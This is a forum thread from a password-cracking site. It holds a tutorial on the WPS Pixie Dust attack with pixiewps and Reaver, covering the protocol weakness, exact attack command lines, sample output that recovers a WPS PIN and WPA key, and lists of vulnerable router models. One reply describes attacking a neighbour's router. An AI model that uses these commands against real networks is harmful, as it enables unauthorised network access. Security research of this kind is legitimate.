NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - Wireless Cracking - [TUT] Pixie Dust Attack with Pixiewps


26 Results - Page 1 of 1 -
1
Author Message
Avatar
hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Fri, 03 Apr 2015 @ 11:09:24

DISCLAIMER: this tutorial has been made for education purposes only.

A bit of background first. The Pixie Dust Attack is a WPS attack aimed to crack the PIN offline, exploiting the non-existing or low entropy of some APs. This vulnerability was discovered by Dominique Bongard. All credits for the research go to him.

Sources:


The roles of the devices in a common WPS transaction are:
- Registrar: client/attacker
- Enrollee: access point

Let's have a look at part of the information exchanged between the two (|| means concatenation):
- Enrollee -> Registrar: M1 (E-Nonce || description || PKE)
- Registrar -> Enrollee: M2 (E-Nonce || R-Nonce || description || PKR)
- Enrollee -> Registrar: M3 (R-Nonce || E-Hash1 || E-Hash2)

PKE: Public Key Enrollee (g^A mod p)
PKR: Public Key Registrar (g^B mod p)
E-Nonce: Enrollee Nonce
R-Nonce: Registrar Nonce

And now comes the interesting part:
- E-Hash1: HMAC{AuthKey}(ES-1 || PSK1 || PKE || PKR)
- E-Hash2: HMAC{AuthKey}(ES-2 || PSK2 || PKE || PKR)

PSK1 is a truncated hash of the first 4 digits of the WPS pin
PSK2 is a truncated hash of the last 4 digits of the WPS pin

On M3 packet the AP is proving us that it knows the first half of the pin (with E-Hash1) and the second half (with E-Hash2). Of those two hashes we know everything except PSK1 and ES-1 and PSK2 and ES-2 respectivly.
- PSK1 and PSK2 needs only 10,000 + 1,000 guesses to find (if the last digit is used as checksum or 20,000 if not).
- ES-1 and ES-2 are two 128 bits random nonces, which would be impossible to bruteforce, right?

The question now is how are they generated? Are they truly random? No, not for every AP/manufacturer at least. Bongard looked up at two implementation: Ralink and Broadcom.
- The former uses ES-1 = ES-2 = 0 (constant) so we just need to bruteforce the PIN with 11000 guesses.
- The latter has the code of its random function publicy hosted online on GitHub (lol). It will work only for some old devices, though (probably those ones shipped from 2011 - 2013).

It uses the r_rand() function from C (wich is not secure) that uses a Linear Congruential Generator and its entropy is of 25 bits only (instant to bruteforce).
The ES-1 is calculated after the E-Nonce so you just need to guess the seed (25 bits of entropy) until you find the same sequence that leads to the E-Nonce. That's it.

Now aside for those two manufacturers, it is also importat to mention that the majority of APs (if not all) use random pseudo-namber generators of 32 bits and have low entropy at boot. So more vulnerabilities are out there just need to be discovered by someone.

Now let's talk about the tool, pixiewps.

Credits to wiire for its wonderful tool. I'll quote his post to describe it best:

wiire said:


Download
Description: Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some APs (pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.
License: GNU GPLv3

Features:
- Checksum optimization: it'll try first for valid PINs (11'000).
- Reduced entropy of the seed from 32 to 25 bits for the C LCG random function.
- Small Diffie-Hellman keys: don't need to specify the Public Registrar Key if the same option is used with Reaver

The program will also try first with E-S0 = E-S1 = 0, then it'll tries to bruteforce the seed of the PRNG if the --e-nonce option is specificed.

Also thanks to soxrok2212 who made a very nice tutorial: youtu.be/_sbdQMH8cQ8. On the description there's a link to the modified version of reaver-forked to display all the useful information (except PKR).

I'll appreciate feedback, bug reports and improvements suggestions but please don't ask me:
- to work on a modified version of Reaver/Bully
- to send you data of some vulnerable devices
- to make a list of vulnerable devices

Thanks to everyone who stepped (or will step) into this project, especially who helped me out.

To gather all the data needed we need a modified version of Reaver/Bully. In the post of wiire there's a youtube video with the link of said modified version. Actually, the only piece of information that we would need to carry on this attack is AuthKey (--authkey). All the other data can be gathered from Wireshark but if Reaver prints it out for us it makes our life so much easier.

The tool has the small Diffie-Hellman keys option (-S, --dh-small) and, if used, the Registrar Public Key is not needed. Otherwise you have to start the attack recording or monitoring the wps session with wireshark (just type EAPOL as filter) and then gather it from the M2 message under Public Key as the modified version of Reaver doesn't print it.

This was just to introduce the tool and to post a sort of guide to make you start using the program. Sorry if it's a bit messed up, I may clean it up a bit later. Meanwhile have fun testing!


Avatar
ziggycat

Status: n/a
Joined: Wed, 18 Mar 2015
Posts: 48
Team:
Reputation: 42 Reputation
Offline
Fri, 03 Apr 2015 @ 16:42:13

fab post mate... I'll have a play with this over the weekend... thanks for taking the effort to write up a tutorial.


Avatar
flyinghaggis

Status: Trusted
Joined: Wed, 19 Feb 2014
Posts: 536
Team:
Reputation: 622 Reputation
Offline
Fri, 03 Apr 2015 @ 16:45:53

Aye, soxrok2212, was one of the first to attempt anything/understand with this after it was first published by Bongard ( but he "Bongard" wasn't releasing anything).


There were several others who also contributed to this but yes hats off to soxrok2212 to highlighting and getting it off the ground.




Rab.





BTC: 19b8m63qe2hMchz7BBgyGudNPpTycJcRAQ

Avatar
blandyuk
Admin / Owner
Status: Trusted
Joined: Tue, 05 Jul 2011
Posts: 3031
Team: HashKiller
Reputation: 4050 Reputation
Offline
Fri, 03 Apr 2015 @ 18:48:28

This looks very good. I have made it a sticky topic so will be available at the top of the forum.



Please read the forum rules | Please read the paid section rules
I accept private hash lists, with forum donations only.
BTC: 15qF9WUeFUD63ishxyAMiEgGqTcYzk4j9b
GPU Power: 9x GTX 1070 + 4x GTX 1080

Avatar
jugganuts420

Status: n/a
Joined: Sat, 21 Feb 2015
Posts: 318
Team:
Reputation: 317 Reputation
Offline
Fri, 03 Apr 2015 @ 20:22:51

Great im glad to see it be released!

but i am getting errors compiling. is anyone else? or am i just forgetting some dependences? running ubuntu 14.04.2

gcc -lssl -lcrypto -Wall -Werror pixiewps.c -o pixiewps
/tmp/ccte99U1.o: In function `hmac_sha256':
pixiewps.c.text+0xf1c): undefined reference to `HMAC_CTX_init'
pixiewps.c.text+0xf21): undefined reference to `EVP_sha256'
pixiewps.c.text+0xf46): undefined reference to `HMAC_Init_ex'
pixiewps.c.text+0xf66): undefined reference to `HMAC_Update'
pixiewps.c.text+0xf86): undefined reference to `HMAC_Final'
pixiewps.c.text+0xf95): undefined reference to `HMAC_CTX_cleanup'
collect2: error: ld returned 1 exit status
make: *** [all] Error 1


+rep if i helped :)

Avatar
hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Fri, 03 Apr 2015 @ 20:31:42

jugganuts420 said:

Great im glad to see it be released!

but i am getting errors compiling. is anyone else? or am i just forgetting some dependences? running ubuntu 14.04.2

gcc -lssl -lcrypto -Wall -Werror pixiewps.c -o pixiewps
/tmp/ccte99U1.o: In function `hmac_sha256':
pixiewps.c.text+0xf1c): undefined reference to `HMAC_CTX_init'
pixiewps.c.text+0xf21): undefined reference to `EVP_sha256'
pixiewps.c.text+0xf46): undefined reference to `HMAC_Init_ex'
pixiewps.c.text+0xf66): undefined reference to `HMAC_Update'
pixiewps.c.text+0xf86): undefined reference to `HMAC_Final'
pixiewps.c.text+0xf95): undefined reference to `HMAC_CTX_cleanup'
collect2: error: ld returned 1 exit status
make: *** [all] Error 1

You need to install openssl. Try: sudo apt-get install libssl-dev.


Avatar
jugganuts420

Status: n/a
Joined: Sat, 21 Feb 2015
Posts: 318
Team:
Reputation: 317 Reputation
Offline
Fri, 03 Apr 2015 @ 20:34:36

hash-ire said:

jugganuts420 said:

Great im glad to see it be released!

but i am getting errors compiling. is anyone else? or am i just forgetting some dependences? running ubuntu 14.04.2

gcc -lssl -lcrypto -Wall -Werror pixiewps.c -o pixiewps
/tmp/ccte99U1.o: In function `hmac_sha256':
pixiewps.c.text+0xf1c): undefined reference to `HMAC_CTX_init'
pixiewps.c.text+0xf21): undefined reference to `EVP_sha256'
pixiewps.c.text+0xf46): undefined reference to `HMAC_Init_ex'
pixiewps.c.text+0xf66): undefined reference to `HMAC_Update'
pixiewps.c.text+0xf86): undefined reference to `HMAC_Final'
pixiewps.c.text+0xf95): undefined reference to `HMAC_CTX_cleanup'
collect2: error: ld returned 1 exit status
make: *** [all] Error 1

You need to install openssl. Try: sudo apt-get install libssl-dev.

libssl-dev is already the newest version. (its already installled)


+rep if i helped :)

Avatar
hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Fri, 03 Apr 2015 @ 21:10:13

jugganuts420 said:

libssl-dev is already the newest version. (its already installled)

Then you have to link the libraries when compiling. Just google for it.


Avatar
hashtka

Status: Trusted
Joined: Wed, 15 May 2013
Posts: 2015
Team: egy.Z0nE
Reputation: 4037 Reputation
Offline
Sat, 04 Apr 2015 @ 05:50:35


perfect tool


BTC:1PSRYuzqQ9cguLGTULe1vyzYa4TG9fvuzb

Avatar
hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Sat, 04 Apr 2015 @ 10:06:10

hash-ire said:

jugganuts420 said:

libssl-dev is already the newest version. (its already installled)

Then you have to link the libraries when compiling. Just google for it.


Ok ignore my last post. Apparently there's an error in the Makefile. Dependencies are reversed on the command line, so something that depends on something else should actually be put before what it depends on on the command line.

Try replacing the existing Makefile with this one.

Attachments don't seem to work with me.

The youtube video has been reuploaded in HD. So the link's changed.


Avatar
hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Sat, 04 Apr 2015 @ 18:32:45

The issue has been reported and fixed. Should compile fine now on Ubuntu.


Avatar
harryboberries

Status: n/a
Joined: Fri, 03 Apr 2015
Posts: 169
Team:
Reputation: 212 Reputation
Offline
Sun, 05 Apr 2015 @ 20:40:40

New to posting in the Forums, but have been reading this forum for some time. I have also been aware of hashcat killer GUI for over a year.
I love the forums and the tools provided. I want to help where I can and provide additional information.

I've been anticipating the release of PixieWPS for nearly a month and got straight to work this weekend. I have tested 3 Broadcom devices so far, but none appear to be vulnerable. I think I've got everything entered correctly.

I'm running a "reaver -i mon0 -c x -b xx:xx:xx:xx:xx:xx -vv" command against the AP. I think the -S command is only used for Ralink

I'm running a "pixiewps -e PKE -r PKR -s E-Hash1 -z E-Hash2 -a AuthKey -n E-Nonce" command in PixieWPS.
I am of course using the key information provided by Reaver in the appropriate fields.
I've obtained the PKR value from the M2 message in Wireshark, using edit -> copy -> value.

I understand this may not be the appropriate place to attach my findings, but again I have 3 APs that I would like to add to the Excel data.
If anyone will tell me where to post this information, I would be grateful. I do greatly appreciate this tool and know it will become better over time.
A big thanks to all that have contributed.


4x R9 280x Windforce - BTC 1JGDEge8inRr877KYkrj97uTjZsC6Tz29C

Avatar
hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Mon, 06 Apr 2015 @ 18:04:52

harryboberries said:

I've been anticipating the release of PixieWPS for nearly a month and got straight to work this weekend. I have tested 3 Broadcom devices so far, but none appear to be vulnerable. I think I've got everything entered correctly.

Only a few old Broadcom's are vulnerable (probably those shipped between 2011 and 2013, BCM3xxx?).

harryboberries said:

I'm running a "reaver -i mon0 -c x -b xx:xx:xx:xx:xx:xx -vv" command against the AP. I think the -S command is only used for Ralink

I'm running a "pixiewps -e PKE -r PKR -s E-Hash1 -z E-Hash2 -a AuthKey -n E-Nonce" command in PixieWPS.

You can avoid using PKR ('-r' or '--pkr') for ANY device if you use '-S' (or '--dh-small') in BOTH Reaver and Pixiewps. I've written it also in my post.

harryboberries said:

I've obtained the PKR value from the M2 message in Wireshark, using edit -> copy -> value.

Be sure to get the right one. Values change (in general) in different sessions.

harryboberries said:

I understand this may not be the appropriate place to attach my findings, but again I have 3 APs that I would like to add to the Excel data.
If anyone will tell me where to post this information, I would be grateful. I do greatly appreciate this tool and know it will become better over time.
A big thanks to all that have contributed.

You can send me a PM. I can contact the 'crew'. Or send an email to soxrok2212@gmail.com or comment his video.


Avatar
hash-ire

Status: n/a
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 308 Reputation
Offline
Fri, 10 Apr 2015 @ 23:23:33

Pixiewps 1.0.5 is out!

Added a partial implementation for Realtek based APs. It may work only with some for now. Check the kali forum and wiire 's repository for more info.


Avatar
t6_x

Status: n/a
Joined: Mon, 13 Apr 2015
Posts: 2
Team:
Reputation: 0 Reputation
Offline
Mon, 13 Apr 2015 @ 00:31:53

Hello

I made a modification to reaver for him to do the pixiedust when testing a pin number

Here's my contribution

GitHub

https://github.com/t6x/reaver-wps-fork-t6x


Example


Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com
mod by t6_x t6_x@hotmail.com

[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9..:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9..:....:....:...
[+] Associated with A.:9..:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:........
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:........
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:.......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust]

  • ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
  • [Pixie-Dust]
  • ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
  • [Pixie-Dust]
  • PSK1: dd:09:bd:24:..........
  • [Pixie-Dust]
  • PSK2: 77:e0:dd:00:........
  • [Pixie-Dust] [+] WPS pin: 9178....
    [Pixie-Dust]
    [Pixie-Dust]
  • Time taken: 0 s
  • [Pixie-Dust]
    Running the reaver with the correct pin wait ...

    [Reaver Test] BSSID: A.:9..:3.:..:..
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '9178....'
    [Reaver Test] [+] WPA PSK: '112233'
    [Reaver Test] [+] AP SSID: '....'


    Any problem or suggestion please contact me


    Avatar
    soxrok2212

    Status: Cracker
    Joined: Sat, 24 Oct 2015
    Posts: 451
    Team:
    Reputation: 421 Reputation
    Offline
    Sat, 24 Oct 2015 @ 19:33:12

    Hey all, wondering if anyone has looked into
    Intel: https://wikidevi.com/wiki/Intel
    Marvell: https://wikidevi.com/wiki/Marvell
    TrendChip: https://wikidevi.com/wiki/TrendChip

    I'm pretty sure Marvell chips are Linux based so I don't expect much from that, but apparently there are a few Intel and TrendChip devices floating around out that that I'd like to peek into if you guys have access to it.



    BTC: 1B4ZAbWYQ399p6QJm3VLbywiCWVSBAXYJ1

    NVIDIA
    1x GTX 1080 Founder’s Edition
    1x GTX 980 Reference Design

    Avatar
    dallibab

    Status: n/a
    Joined: Fri, 29 Jul 2016
    Posts: 4
    Team:
    Reputation: 0 Reputation
    Offline
    Wed, 10 Aug 2016 @ 00:31:46

    Messing around with my neighbours bthomehub 5 ( with permission) , ran reaver with pixie dust and got the WPA key straight away,

    tried again a couple of days later but didnt work, changed my mac address and bang worked again.

    Are the keys / serials any good to anyone working on these hubs. didnt think wps attacks should work on a router this new

    thanks


    Avatar
    cheeseuk1989

    Status: n/a
    Joined: Sun, 03 May 2015
    Posts: 39
    Team:
    Reputation: 10 Reputation
    Offline
    Fri, 12 Aug 2016 @ 21:47:00

    dallibab said:

    Messing around with my neighbours bthomehub 5 ( with permission) , ran reaver with pixie dust and got the WPA key straight away,

    tried again a couple of days later but didnt work, changed my mac address and bang worked again.

    Are the keys / serials any good to anyone working on these hubs. didnt think wps attacks should work on a router this new

    thanks

    What reaver commends did you use to get the keys?


    Avatar
    nikon1982

    Status: n/a
    Joined: Fri, 25 Dec 2015
    Posts: 21
    Team:
    Reputation: 0 Reputation
    Offline
    Thu, 15 Sep 2016 @ 21:43:40

    Pixiewps pin not found why?

    in this file report of reaver

    http://rgho.st/86HYVbB9B

    http://rgho.st/8LD7qMBBC



    Avatar
    semutapi

    Status: n/a
    Joined: Tue, 27 Sep 2016
    Posts: 7
    Team:
    Reputation: 0 Reputation
    Offline
    Tue, 27 Sep 2016 @ 21:11:06

    Thanks. I will try it. hee


    Avatar
    Hosehead1

    Status: n/a
    Joined: Tue, 11 Oct 2016
    Posts: 5
    Team:
    Reputation: 0 Reputation
    Offline
    Tue, 11 Oct 2016 @ 05:28:07

    Ahem... has anyone EVER had results from the full PRNG bruteforce? I ask because that option does not exist in the pixiewps currently in kali's repository, nor in the AAnarchYY fork for that matter. The -f switch which used to do "full PRNG bruteforce" now denotes "Disable channel hopping". If it was a good feature why was it removed, and/or, how do we get it back?

    ps: Attn nikon1982 - both your files are gone off rghost... ?


    Avatar
    Antony_Sawyer

    Status: n/a
    Joined: Sat, 19 Nov 2016
    Posts: 6
    Team:
    Reputation: 0 Reputation
    Offline
    Mon, 21 Nov 2016 @ 09:44:37

    I have to try this!


    Avatar
    dark0

    Status: n/a
    Joined: Tue, 13 Feb 2018
    Posts: 44
    Team:
    Reputation: 10 Reputation
    Offline
    Thu, 15 Feb 2018 @ 01:53:32

    Yes but to work this you may be enough close to the access point ! Or by a alpha card!


    Avatar
    vtar

    Status: n/a
    Joined: Wed, 07 Mar 2018
    Posts: 126
    Team:
    Reputation: 6 Reputation
    Online
    Sat, 19 May 2018 @ 10:31:55

    It just doesn't works against TP-Link Archer C1200


    Avatar
    freeroute
    Moderator
    Status: Trusted
    Joined: Sat, 16 Jul 2016
    Posts: 2302
    Team:
    Reputation: 7782 Reputation
    Online
    Sat, 09 Jun 2018 @ 22:31:40

    TP-Link Wireless N Router WR840N is vulnerable.

    Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
    Hardware Version: TL-WR840N v5 00000005


    If I helped a +rep is appreciated!

    : 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
    XMPP: freeroute@xmpp.jp

    Avatar
    vtar

    Status: n/a
    Joined: Wed, 07 Mar 2018
    Posts: 126
    Team:
    Reputation: 6 Reputation
    Online
    Wed, 22 Aug 2018 @ 03:38:57

    Unfortunately, TP-LINK Archer C1200 is not vulnerable



    26 Results - Page 1 of 1 -
    1

    We have a total of 162983 messages in 20470 topics.
    We have a total of 19225 registered users.
    Our newest registered member is evsteeva.